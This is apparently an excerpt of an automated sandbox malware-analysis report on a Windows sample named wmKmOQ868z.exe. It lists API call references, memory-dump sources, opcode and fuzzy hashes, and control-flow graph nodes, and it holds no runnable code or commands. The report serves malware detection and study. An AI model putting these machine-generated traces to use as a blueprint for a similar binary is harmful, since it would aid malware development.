                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: fa5d952c960e1f7386ddb97ece3eb22ae1da82230fb5cee2c9879dd27ceb2066
                                          • Instruction ID: 27062d553eaf0570c47ea1e9c9d986ab9c0de2e4c683f5ffa46dc3ce1155bae0
                                          • Opcode Fuzzy Hash: fa5d952c960e1f7386ddb97ece3eb22ae1da82230fb5cee2c9879dd27ceb2066
                                          • Instruction Fuzzy Hash: EA31CDF2204601DBDB25AF68DA88C2A77F6FFCB314710527EF24093260CB706825DBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: FreeGlobal
                                          • String ID:
                                          • API String ID: 2979337801-0
                                          • Opcode ID: f14768f42327b03c79bcbb8f40736b7589c4ecd460f069d72b1521e3dc751499
                                          • Instruction ID: 9034946e711feddac6e568252069688ca7173c49383d1fb805143f3a4be69178
                                          • Opcode Fuzzy Hash: f14768f42327b03c79bcbb8f40736b7589c4ecd460f069d72b1521e3dc751499
                                          • Instruction Fuzzy Hash: AF51B0F2D04118AA8B10BFB8C754AAEB7F5AF4535CF0192BBD404A7250E7F1BD458791
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 6F7025C2
                                            • Part of subcall function 6F7012CC: lstrcpynW.KERNEL32(00000000,?,6F70137F,00000019,6F7011CA,-000000A0), ref: 6F7012DC
                                          • GlobalAlloc.KERNEL32(00000040), ref: 6F702548
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F702563
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                          • String ID:
                                          • API String ID: 4216380887-0
                                          • Opcode ID: 65003e5c3ce9e53c51039b60db6c69cf6d4da5c015453f1d9b3ec5a10f35f440
                                          • Instruction ID: 9415a4d0a20acebb7666afa062afdb54f6cca9302e5fc3bced85c3911244fca1
                                          • Opcode Fuzzy Hash: 65003e5c3ce9e53c51039b60db6c69cf6d4da5c015453f1d9b3ec5a10f35f440
                                          • Instruction Fuzzy Hash: D041E1F2108705DFDB14FF28DA44A2677F8FF95314F10466EF54986191EB70A940CBA5
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F7022D8,?,00000808), ref: 6F7016D5
                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F7022D8,?,00000808), ref: 6F7016DC
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F7022D8,?,00000808), ref: 6F7016F0
                                          • GetProcAddress.KERNEL32(6F7022D8,00000000), ref: 6F7016F7
                                          • GlobalFree.KERNEL32(00000000), ref: 6F701700
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                          • String ID:
                                          • API String ID: 1148316912-0
                                          • Opcode ID: 18af7db4897dd5b8e4dce3787c377fd81f162b5c8b484d6fbac508c9754c7a8c
                                          • Instruction ID: ef6a563de0e2a684d5ddfbaa4994b7598429d034a4ee8ce26d7f4cdd233bf4bb
                                          • Opcode Fuzzy Hash: 18af7db4897dd5b8e4dce3787c377fd81f162b5c8b484d6fbac508c9754c7a8c
                                          • Instruction Fuzzy Hash: 87F0A7721061387FCA201AA78C0CC9B7E9CEFCB2F5B010366F318E11A089214C11D7F5
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
                                          • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405E45
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-823278215
                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                          • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6F701171
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 6F7011E3
                                          • GlobalFree.KERNEL32 ref: 6F70124A
                                          • GlobalFree.KERNEL32(?), ref: 6F70129B
                                          • GlobalFree.KERNEL32(00000000), ref: 6F7012B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2686110588.000000006F701000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F700000, based on PE: true
                                          • Associated: 00000000.00000002.2686088914.000000006F700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686134312.000000006F704000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000000.00000002.2686197105.000000006F706000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f700000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 4fd785e9bd43838a8cd7d3bd2119288f9d547cb81de2a05df7610f8c0093dfd8
                                          • Instruction ID: fd53527197ba25e612bd3f13ac5fcac0f1ce9d42e113c4304b13010d3db62cb1
                                          • Opcode Fuzzy Hash: 4fd785e9bd43838a8cd7d3bd2119288f9d547cb81de2a05df7610f8c0093dfd8
                                          • Instruction Fuzzy Hash: 985143F59007069FDB00EF78EA48A6A77E4FF46329B00453AF544DB250EBB4A920CB54
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
                                          • GetTickCount.KERNEL32 ref: 0040306F
                                          • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                          • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                          • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                          APIs
                                          • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,0000000A,?,00000008,0000000A,0000000C), ref: 00403BAB
                                          • GlobalFree.KERNEL32(0096EE70), ref: 00403BB2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-823278215
                                          • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                          • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                          • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                          APIs
                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wmKmOQ868z.exe,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 00405E75
                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wmKmOQ868z.exe,C:\Users\user\Desktop\wmKmOQ868z.exe,80000000,00000003), ref: 00405E85
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-1246513382
                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                          • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                          APIs
                                          • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405FD1
                                          • CharNextA.USER32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE2
                                          • lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2652448321.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2652423828.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652463308.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652479184.00000000007F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2652822257.00000000007F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                          • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 79354 328e2c70 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 328e35c0-328e35cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6c2ee5b833634d9c14f414d40d6a98c85fe3fffdfca6ae0671346e9ebb697a00
                                          • Instruction ID: e81d9c64642edabdc1a3f1603ed3f4f0b90e7dd6bed4f322310118ab7f088a45
                                          • Opcode Fuzzy Hash: 6c2ee5b833634d9c14f414d40d6a98c85fe3fffdfca6ae0671346e9ebb697a00
                                          • Instruction Fuzzy Hash: 2890023560560416D60071586614706110587D1201F65C812A0428528D87D6CA7965A3

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 328e2c70-328e2c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 283e2a92c21db3d04d0f5e9965d00bc65bf41a51c8acfbaeb3c60990ccb242ab
                                          • Instruction ID: a808a685dcd706ede4efdcfc9717a116d4dbdbc2c5a2441ad1f51b7f72012514
                                          • Opcode Fuzzy Hash: 283e2a92c21db3d04d0f5e9965d00bc65bf41a51c8acfbaeb3c60990ccb242ab
                                          • Instruction Fuzzy Hash: 6090023520158816D6107158A50474A010587D1301F59C812A4428618D87D6C9B97122

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 553 329494e0-32949529 554 32949578-32949587 553->554 555 3294952b-32949530 553->555 556 32949534-3294953a 554->556 557 32949589-3294958e 554->557 555->556 558 32949695-329496bd call 328e9020 556->558 559 32949540-32949564 call 328e9020 556->559 560 32949d13-32949d27 call 328e4c30 557->560 569 329496dc-32949712 558->569 570 329496bf-329496da call 32949d2a 558->570 567 32949566-32949573 call 3296972b 559->567 568 32949593-32949634 GetPEB call 3294dc65 559->568 581 3294967d-32949690 RtlDebugPrintTimes 567->581 579 32949636-32949644 568->579 580 32949652-32949667 568->580 571 32949714-32949716 569->571 570->571 571->560 576 3294971c-32949731 RtlDebugPrintTimes 571->576 576->560 587 32949737-3294973e 576->587 579->580 582 32949646-3294964b 579->582 580->581 583 32949669-3294966e 580->583 581->560 582->580 585 32949670 583->585 586 32949673-32949676 583->586 585->586 586->581 587->560 589 32949744-3294975f 587->589 590 32949763-32949774 call 3294a808 589->590 593 32949d11 590->593 594 3294977a-3294977c 590->594 593->560 594->560 595 32949782-32949789 594->595 596 329498fc-32949902 595->596 597 3294978f-32949794 595->597 598 32949a9c-32949aa2 596->598 599 32949908-32949937 call 328e9020 596->599 600 32949796-3294979c 597->600 601 329497bc 597->601 604 32949af4-32949af9 598->604 605 32949aa4-32949aad 598->605 615 32949970-32949985 599->615 616 32949939-32949944 599->616 600->601 606 3294979e-329497b2 600->606 602 329497c0-32949811 call 328e9020 RtlDebugPrintTimes 601->602 602->560 642 32949817-3294981b 602->642 610 32949aff-32949b07 604->610 611 32949ba8-32949bb1 604->611 605->590 609 32949ab3-32949aef call 328e9020 605->609 612 329497b4-329497b6 606->612 613 329497b8-329497ba 606->613 636 32949ce9 609->636 619 32949b13-32949b3d call 32948513 610->619 620 32949b09-32949b0d 610->620 611->590 617 32949bb7-32949bba 611->617 612->602 613->602 627 32949987-32949989 615->627 628 32949991-32949998 615->628 622 32949946-3294994d 616->622 623 3294994f-3294996e 616->623 624 32949bc0-32949c0a 617->624 625 32949c7d-32949cb4 call 328e9020 617->625 639 32949b43-32949b9e call 328e9020 RtlDebugPrintTimes 619->639 640 32949d08-32949d0c 619->640 620->611 620->619 622->623 635 329499d9-329499f6 RtlDebugPrintTimes 623->635 633 32949c11-32949c1e 624->633 634 32949c0c 624->634 651 32949cb6 625->651 652 32949cbb-32949cc2 625->652 637 3294998f 627->637 638 3294998b-3294998d 627->638 630 329499bd-329499bf 628->630 643 329499c1-329499d7 630->643 644 3294999a-329499a4 630->644 645 32949c20-32949c23 633->645 646 32949c2a-32949c2d 633->646 634->633 635->560 667 329499fc-32949a1f call 328e9020 635->667 647 32949ced 636->647 637->628 638->628 639->560 685 32949ba4 639->685 640->590 653 3294981d-32949825 642->653 654 3294986b-32949880 642->654 643->635 648 329499a6 644->648 649 329499ad 644->649 645->646 657 32949c2f-32949c32 646->657 658 32949c39-32949c7b 646->658 656 32949cf1-32949d06 RtlDebugPrintTimes 647->656 648->643 659 329499a8-329499ab 648->659 661 329499af-329499b1 649->661 651->652 662 32949cc4-32949ccb 652->662 663 32949ccd 652->663 664 32949827-32949850 call 32948513 653->664 665 32949852-32949869 653->665 666 32949886-32949894 654->666 656->560 656->640 657->658 658->656 659->661 669 329499b3-329499b5 661->669 670 329499bb 661->670 671 32949cd1-32949cd7 662->671 663->671 673 32949898-329498ef call 328e9020 RtlDebugPrintTimes 664->673 665->666 666->673 683 32949a21-32949a3b 667->683 684 32949a3d-32949a58 667->684 669->670 678 329499b7-329499b9 669->678 670->630 679 32949cde-32949ce4 671->679 680 32949cd9-32949cdc 671->680 673->560 689 329498f5-329498f7 673->689 678->630 679->647 686 32949ce6 679->686 680->636 687 32949a5d-32949a8b RtlDebugPrintTimes 683->687 684->687 685->611 686->636 687->560 691 32949a91-32949a97 687->691 689->640 691->617
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $ $0
                                          • API String ID: 3446177414-3352262554
                                          • Opcode ID: bd20800d916556a67d21cc21049a4ef042aba552267c05e4857ae7e2196b608d
                                          • Instruction ID: bc3fbfa19be7689325fef83df435c6293a72c6636b8730b7189be4aff9f0d5d7
                                          • Opcode Fuzzy Hash: bd20800d916556a67d21cc21049a4ef042aba552267c05e4857ae7e2196b608d
                                          • Instruction Fuzzy Hash: F732F4B560C3818FE320CF68C484B5ABBE9BF88348F44492DF59987251DBB5E949CB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
